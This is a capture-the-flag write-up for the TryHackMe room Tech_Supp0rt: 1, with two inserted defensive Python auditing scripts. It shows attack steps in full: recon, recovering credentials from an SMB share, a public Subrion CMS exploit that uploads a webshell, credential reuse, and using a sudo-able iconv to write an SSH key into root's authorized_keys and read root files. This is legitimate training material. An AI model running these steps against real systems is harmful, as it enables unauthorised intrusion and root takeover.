TryHackMe Tech_Supp0rt: 1 Writeup
Hey my friends, I’m Medhat Fathy and this is my write-up for the Tech_Supp0rt: 1 room.
Description: Hack into the scammer’s under-development website to foil their plans.
Reconnaissance
0xmedhat@kali:/$ sudo nmap -sS -sV 10.10.138.144
[sudo] password for 0xmedhat:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-15 17:23 EDT
Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.05% done; ETC: 17:23 (0:00:01 remaining)
Nmap scan report for 10.10.138.144 (10.10.138.144)
Host is up (0.26s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.27 seconds
We have 4 ports open:
- port 22: ssh
- port 80: http (Apache)
- port 139: netbios
- port 445: netbios
Let’s use smbmap to list the SMB shares:
0xmedhat@kali:/$ smbmap -H 10.10.138.144
[+] Guest session IP: 10.10.138.144:445 Name: 10.10.138.144
Disk Permissions Comment
----------------------------------------
print$ NO ACCESS Printer Drivers
websvr READ ONLY
IPC$ NO ACCESS IPC Service (TechSupport server (Samba, Ubuntu))
Let’s read the content of websvr using smbclient:
0xmedhat@kali:/$ smbclient \\\\10.10.138.144\\websvr
Enter WORKGROUP\kali’s password:
Try “help” to get a list of possible commands.
smb: \> ls
. D 0 Sat May 29 03:17:38 2021
.. D 0 Sat May 29 03:03:47 2021
enter.txt N 273 Sat May 29 03:17:38 2021

8460484 blocks of size 1024. 5700016 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> ^C
0xmedhat@kali:/$ cat enter.txt
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn’t work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->
We got a credential.
Let’s decode it with https://gchq.github.io/CyberChef/
So now we have a credential: username “admin” and password “****2021”.
Then I went to the IP, but it was useless.
Then, using gobuster, I found the path /subrion/panel.
Logged in using the user & pass.
I searched for an exploit for it; I found many ways, but I used this one:
https://packetstormsecurity.com/files/162591/Subrion-CMS-4.2.1-Shell-Upload.html
Download the code and change the permission using chmod +x.
0xmedhat@kali:/$ python3 exploit.py -u http://10.10.138.144/subrion/panel/ -l admin -p Scam2021
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://10.10.138.144/subrion/panel/
[+] Success!
[+] Got CSRF token: n75r3m1vigDfgSjN3lOwPIGXYwD0cnP69Nzha6WX
[+] Trying to log in…
[+] Login Successful!
[+] Generating random name for Webshell…
[+] Generated webshell name: dtkjwpwuxutpueh
[+] Trying to Upload Webshell..
[+] Upload Success… Webshell path: http://10.10.138.144/subrion/panel/uploads/dtkjwpwuxutpueh.phar
$ ls
dtkjwpwuxutpueh.phar
Then I created a bash reverse shell, ran linpeas, and found db_user and db_pass:
DB_USER = "support"
DB_PASS = "***ScammerLOL!123!"
I used the password to connect as scamsite, who is the only user on the machine, and it works!!
Let’s escalate our privileges.
scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
(ALL) NOPASSWD: /usr/bin/iconv
scamsite@TechSupport:~$
Let’s go to GTFOBins.
We can generate a key using ssh-keygen:
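The `sudo -l` output above is the whole privilege-escalation story: a NOPASSWD rule on a binary that reads from and writes to any path as root. As an added example (not part of the room or of the original write-up), the script below parses `sudo -l` output in that format and rates each rule, so a hardening review can catch this before an attacker does. `SUDO_L_SAMPLE` is constructed to mirror the room's output plus one benign rule; `FILE_IO_BINARIES` holds only the iconv case from this page and is meant to be extended from the GTFOBins file-read/file-write categories.

```python
"""Flag sudo rules that let a user run a file-read/write capable binary, the
misconfiguration this write-up abuses via /usr/bin/iconv.

Added example, not part of TryHackMe or the original post. SUDO_L_SAMPLE is
constructed to mirror the room's `sudo -l` output; FILE_IO_BINARIES is a
starting point to be extended from GTFOBins for a real baseline.
"""
import re
from typing import List, NamedTuple

FILE_IO_BINARIES = {
    # from this write-up: iconv's input path is read and -o path is written as the run-as user
    "/usr/bin/iconv": "reads and writes arbitrary files as the run-as user",
}

# Constructed sample in the shape of the room's `sudo -l` output.
SUDO_L_SAMPLE = """\
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv
    (root) /usr/bin/apt-get update
"""


class SudoRule(NamedTuple):
    runas: str
    nopasswd: bool
    commands: List[str]


class Finding(NamedTuple):
    binary: str
    severity: str
    reason: str


# "(runas) TAG: TAG: cmd1, cmd2" -- tags are upper-case words such as NOPASSWD
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Parse the rules section of `sudo -l` output into SudoRule records."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        # Everything before the "User X may run ..." header is Defaults noise.
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        tags = m.group("tags")
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append(SudoRule(m.group("runas").strip(), "NOPASSWD:" in tags, cmds))
    return rules


def audit(rules: List[SudoRule]) -> List[Finding]:
    """Rate each rule: ALL, or a file-I/O binary, is effectively root access."""
    findings = []
    for rule in rules:
        for cmd in rule.commands:
            binary = cmd.split()[0]
            if cmd == "ALL":
                findings.append(Finding("ALL", "critical", "unrestricted sudo"))
            elif binary in FILE_IO_BINARIES:
                # Without NOPASSWD the user's own password is still a speed bump.
                sev = "high" if rule.nopasswd else "medium"
                findings.append(Finding(binary, sev, FILE_IO_BINARIES[binary]))
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudo_l(SUDO_L_SAMPLE)):
        print(f"[{f.severity}] {f.binary}: {f.reason}")
```

Run it against `sudo -l -U <user>` output collected during a build review; the fix for a hit is to remove the rule or replace the raw binary with a wrapper script that hard-codes the input and output paths.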
0xmedhat@kali:/$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/0xmedhat/.ssh/id_rsa): /home/0xmedhat/THm/must/id_rsa/id_rsa
/home/0xmedhat/THm/must/id_rsa/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/THm/must/id_rsa/id_rsa
Your public key has been saved in /home/kali/THm/must/id_rsa/id_rsa.pub
The key fingerprint is:
SHA256:3FyR+9iqZ38LjuMnylcsAFj8pvH+BFZxF+UGoq/obgQ kali@kali
The key’s randomart image is:
+---[RSA 3072]----+
| +. .oo.o+|
| . o .+o.o |
| o …. o|
| Eo *.o. . |
| .So+ o+ |
| .oo.o.oo |
| .o ..oo |
| .o..+*.. .|
| ooo*B+o.o.|
+----[SHA256]-----+
scamsite@TechSupport:/home$ LFILE=/root/.ssh/authorized_keys
scamsite@TechSupport:/home$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDkEcRYHFyQEO3L1gOzssIU3DB1g0ZYyi1762rgRZZiWQT1kbEzZmDH7/kxys1XTWjQYCaEbXPLWZhX867eo1WihZv/qxStpR5jZ/XZNT26Axdi7X0Y5nvdTh9sZ+PHsgceQiPB/mSAJs1KwOhVCLMnwwQFxWoHINGUnQLSYm66I4SorQzxSCRnHoq0FWaw6hi0fLCzZUr0VZ5w4K0Q8pZuPNERGvKLzOizaZ9DZNqHfJHxu4TaaJjBmfSPRv9kE8Hn7pCfqipMoGCfhTidm2VA1SXp0qkuDA8AEe60/Gb1wiFdOihEd21sYR6Gwr4zv44eRCD5gE1TH3u0nINM+jPyx+G0ULQlg00jHIfFEdI1wPSOohE9iUla/f9nDBC5Lm90ad/4lKU6snNPyaSRf9VdPBpFpbdot2shIzJHPpxofCB6MPYFIRICOAXMI1HE0I/A9m5Z5277ex2miy2D1aqlWGXlCmATKUDB7UO6ToXuMKPmTeX+U1Eh0dQ2E/+KNk= 0xmedhat@kali" | sudo iconv -f 8859_1 -t 8859_1 -o "$LFILE"
Let’s connect as root with the id_rsa we generated.
It works.
root@TechSupport: cat root.txt
851b8233a8c0*********1bd1529bf1ed02790b
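The persistence step above leaves a durable artefact: a public key in /root/.ssh/authorized_keys that no administrator provisioned. As an added example (not part of the room or of the original write-up), the script below audits an authorized_keys file against a baseline of known-good fingerprints, computing fingerprints the way OpenSSH does (SHA-256 over the decoded key blob, base64 without padding) and also flagging structurally broken entries. Both key blobs in `AUTHORIZED_KEYS_SAMPLE` are constructed wire-format blobs with a fake modulus, not real key pairs; `BASELINE` is the assumed allowlist.

```python
"""Audit an authorized_keys file against a baseline of known-good key
fingerprints, to catch the persistence step in this write-up (a key appended
to /root/.ssh/authorized_keys through a sudo-able binary).

Added example, not part of TryHackMe or the original post. Both keys below
are constructed wire-format blobs, not real key pairs; the fingerprint
algorithm is the one OpenSSH uses (SHA-256 over the decoded blob, base64
without padding).
"""
import base64
import hashlib
import struct
from typing import List, NamedTuple, Optional


def _ssh_string(data: bytes) -> bytes:
    """Encode one SSH wire-format string: 4-byte big-endian length + bytes."""
    return struct.pack(">I", len(data)) + data


def _read_ssh_string(raw: bytes) -> bytes:
    """Read the first wire-format string from a decoded blob (the key type)."""
    if len(raw) < 4:
        return b""
    length = struct.unpack(">I", raw[:4])[0]
    return raw[4:4 + length]


def _fake_rsa_blob(seed: bytes) -> str:
    """Structurally valid ssh-rsa blob (type, e, n). Constructed: n is NOT a real modulus."""
    blob = _ssh_string(b"ssh-rsa") + _ssh_string(b"\x01\x00\x01") + _ssh_string(seed * 16)
    return base64.b64encode(blob).decode()


# Constructed sample: one key the administrator provisioned, one that was not.
ADMIN_KEY_LINE = "ssh-rsa " + _fake_rsa_blob(b"admin-baseline") + " admin@bastion"
PLANTED_KEY_LINE = "ssh-rsa " + _fake_rsa_blob(b"planted-key") + " unknown@kali"
AUTHORIZED_KEYS_SAMPLE = "\n".join([
    "# root's authorized_keys (constructed sample)",
    ADMIN_KEY_LINE,
    "",
    PLANTED_KEY_LINE,
])


class KeyEntry(NamedTuple):
    line_no: int
    key_type: str
    fingerprint: Optional[str]   # None when the blob does not decode
    comment: str
    problem: Optional[str]       # structural defect, if any


def fingerprint(blob_b64: str) -> str:
    """SHA256 fingerprint in OpenSSH's format: 'SHA256:' + unpadded base64."""
    digest = hashlib.sha256(base64.b64decode(blob_b64, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> List[KeyEntry]:
    """Parse each key line; never raise, record defects in `problem` instead."""
    entries = []
    for n, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # Skip any leading options (command=, from=, ...) up to the key type.
        idx = next((i for i, f in enumerate(fields) if f.startswith(("ssh-", "ecdsa-"))), None)
        if idx is None or idx + 1 >= len(fields):
            entries.append(KeyEntry(n, "?", None, "", "unrecognised line format"))
            continue
        key_type, blob = fields[idx], fields[idx + 1]
        comment = " ".join(fields[idx + 2:])
        try:
            raw_blob = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            entries.append(KeyEntry(n, key_type, None, comment, "blob is not valid base64"))
            continue
        # The blob embeds its own type string; it must match the declared one.
        embedded = _read_ssh_string(raw_blob)
        problem = None if embedded == key_type.encode() else "declared type does not match blob"
        entries.append(KeyEntry(n, key_type, fingerprint(blob), comment, problem))
    return entries


def audit(text: str, allowlist) -> List[str]:
    """One finding per key that is malformed or absent from the allowlist."""
    findings = []
    for e in parse_authorized_keys(text):
        if e.problem:
            findings.append(f"line {e.line_no}: {e.problem}")
        elif e.fingerprint not in allowlist:
            findings.append(f"line {e.line_no}: unknown key {e.fingerprint} ({e.comment or 'no comment'})")
    return findings


# Assumed allowlist: fingerprints of the keys the administrator provisioned.
BASELINE = {fingerprint(ADMIN_KEY_LINE.split()[1])}

if __name__ == "__main__":
    for finding in audit(AUTHORIZED_KEYS_SAMPLE, BASELINE):
        print(finding)
```

Scheduled against every account's authorized_keys (root's included), this turns the write-up's quiet key drop into an alert; pairing it with a file-integrity watch on /root/.ssh catches the write itself as well.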
Another way, by using file read!
We know the path to root.txt:
scamsite@TechSupport:/home$ LFILE=/root/root.txt
scamsite@TechSupport:/home$ sudo iconv -f 8859_1 -t 8859_1 "$LFILE"
851b8233a8c**********1bd1529bf1ed02790b -
It’s easy :)
Thanks 🥰